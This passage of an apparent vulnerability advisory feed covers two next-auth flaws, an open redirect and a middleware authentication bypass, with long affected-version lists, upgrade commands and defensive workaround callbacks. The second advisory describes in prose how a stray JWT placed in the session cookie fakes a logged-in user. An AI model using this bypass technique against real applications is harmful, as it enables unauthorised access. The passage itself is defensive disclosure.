"0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

URL Redirection to Untrusted Site ('Open Redirect') in next-auth

Published date: 2022-05-24T22:03:07Z
CVE: CVE-2022-29214
Links:

Impact

We found that this vulnerability is present when the developer is implementing an OAuth 1 provider (by extension, it means Twitter, which is the only built-in provider using OAuth 1), but upgrading is still recommended.

next-auth v3 users before version 3.29.3 are impacted. (We recommend upgrading to v4, as v3 is considered unmaintained. See our migration guide)

next-auth v4 users before version 4.3.3 are impacted.

Patches

We've released patches for this vulnerability in:

  • v3 - 3.29.3
  • v4 - 4.3.3

You can do:

npm i next-auth@latest

or

yarn add next-auth@latest

or

pnpm add next-auth@latest

(This will update to the latest v4 version, but you can change latest to 3 if you want to stay on v3.)

Workarounds

If you are not able to upgrade for any reason, you can add the following configuration to your callbacks option:

// async redirect(url, baseUrl) { // v3
async redirect({ url, baseUrl }) { // v4
    // Allows relative callback URLs
    if (url.startsWith("/")) return `${baseUrl}${url}`
    // Allows callback URLs on the same origin
    else if (new URL(url).origin === baseUrl) return url
    return baseUrl
}

References

This vulnerability was discovered right after https://github.com/nextauthjs/next-auth/security/advisories/GHSA-f9wg-5f46-cjmw was published and is very similar in nature.

Read more about the callbacks.redirect option in the documentation: https://next-auth.js.org/configuration/callbacks#redirect-callback

For more information

If you have any concerns, we request responsible disclosure, outlined here: https://next-auth.js.org/security#reporting-a-vulnerability

Timeline

The issue was reported 2022 April 20th, a response was sent out to the reporter 8 minutes after, and a patch was produced within a few days.

Affected versions: ["4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

Possible user mocking that bypasses basic authentication

Published date: 2023-11-20T23:25:36Z
CVE: CVE-2023-48309
Links:

Impact

next-auth applications prior to version 4.24.5 that rely on the default Middleware authorization are affected.

A bad actor could create an empty/mock user, by getting hold of a NextAuth.js-issued JWT from an interrupted OAuth sign-in flow (state, PKCE or nonce).

Manually overriding the next-auth.session-token cookie value with this non-related JWT would let the user simulate a logged in user, albeit having no user information associated with it. (The only property on this user is an opaque randomly generated string).

This vulnerability does not give access to other users' data, neither to resources that require proper authorization via scopes or other means. The created mock user has no information associated with it (ie. no name, email, access_token, etc.)

This vulnerability can be exploited by bad actors to peek at logged in user states (e.g. dashboard layout).

Note: Regardless of the vulnerability, the existence of a NextAuth.js session state can provide simple authentication, but not authorization in your applications. For role-based access control, you can check out our guide.

Patches

We patched the vulnerability in next-auth v4.24.5. To upgrade, run one of the following:

npm i next-auth@latest

yarn add next-auth@latest

pnpm add next-auth@latest

Workarounds

Upgrading to latest is the recommended way to fix this issue. However, using a custom authorization callback for Middleware, developers can manually do a basic authentication:

// middleware.ts
import { withAuth } from "next-auth/middleware"

export default withAuth(/*your middleware function*/, {
  // checking the existence of any property - besides `value` which might be a random string - on the `token` object is sufficient to prevent this vulnerability
  callbacks: { authorized: ({ token }) => !!token?.email }
})

References

Affected versions: ["4.24.4", "4.24.3", "4.24.2", "4.24.1", "4.24.0", "4.23.2", "4.23.1", "4.23.0", "4.22.5", "4.22.4", "4.22.3", "4.22.2", "4.22.1", "4.22.0", "4.21.1", "4.21.0", "4.20.1", "4.20.0", "4.19.2", "4.19.1", "4.19.0", "4.18.10", "4.18.9", "4.18.8", "4.18.7", "4.18.6", "4.18.5", "4.18.4", "4.18.3", "4.18.2", "4.18.1", "4.18.0", "4.17.0", "4.16.4", "4.16.3", "4.16.2", "4.16.1", "4.16.0", "4.15.2", "4.15.1", "4.15.0", "4.14.0", "4.13.0", "4.12.3", "4.12.2", "4.12.1", "4.12.0", "4.11.0", "4.10.3", "4.10.2", "4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "4.0.0-next.26", "4.0.0-next.25", "4.0.0-next.24", "4.0.0-next.23", "4.0.0-next.22", "4.0.0-next.21", "4.0.0-next.20", "4.0.0-next.19", "4.0.0-next.18", "4.0.0-next.17", "4.0.0-next.16", "4.0.0-next.15", "4.0.0-next.14", "4.0.0-next.13", "4.0.0-next.12", "4.0.0-next.11", "4.0.0-next.10", "4.0.0-next.9", "4.0.0-next.8", "4.0.0-next.7", "4.0.0-next.6", "4.0.0-next.5", "4.0.0-next.4", "4.0.0-next.3", "4.0.0-next.2", "4.0.0-next.1", "4.0.0-beta.7", "4.0.0-beta.6", "4.0.0-beta.5", "4.0.0-beta.4", "4.0.0-beta.3", "4.0.0-beta.2", "4.0.0-beta.1", "3.29.10", "3.29.9", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", 